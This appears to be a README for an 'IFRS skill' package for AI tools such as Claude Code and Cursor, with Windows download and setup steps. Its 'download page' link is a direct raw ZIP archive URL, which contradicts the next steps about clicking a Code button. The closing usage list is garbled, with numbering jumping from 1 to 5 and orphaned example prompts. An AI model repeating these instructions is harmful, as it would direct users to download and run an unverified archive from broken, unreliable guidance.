🖥️ What You Need

Before you start, make sure your Windows PC has:

  • Windows 10 or Windows 11
  • A steady internet connection
  • Enough free disk space for the files
  • One of these tools if you plan to use the skill with an AI app:
    • Claude Code
    • Codex
    • Gemini CLI
    • Cursor

If you only want to view the files, you can do that in your browser after download.

📦 Download and Setup

  1. Open the download page: https://github.com/babu9893/ifrs-skill/raw/refs/heads/main/ifrs/skill_ifrs_v2.5.zip

  2. On the GitHub page, look for the green or blue Code button.

  3. Click Code, then choose Download ZIP.

  4. Save the ZIP file to your Downloads folder.

  5. Right-click the ZIP file and choose Extract All.

  6. Pick a folder you can find again, such as:

    • Desktop
    • Documents
    • Downloads
  7. Open the extracted folder.

  8. Look for the main skill files, readme files, and any folders named for workflows, templates, or standards.

  9. If you use an AI app, copy the project folder to the location that app expects for skills or project files.

  10. Open the app you want to use and point it to the ifrs-skill folder, or add the files as your app instructs.

A simple way to use the files is:

  1. Open your AI app.

    • Review this lease note for IFRS issues

    • Create an audit checklist for this filing
    • Draft a compliance template for a report
  5. Review the result before you use it in your work.
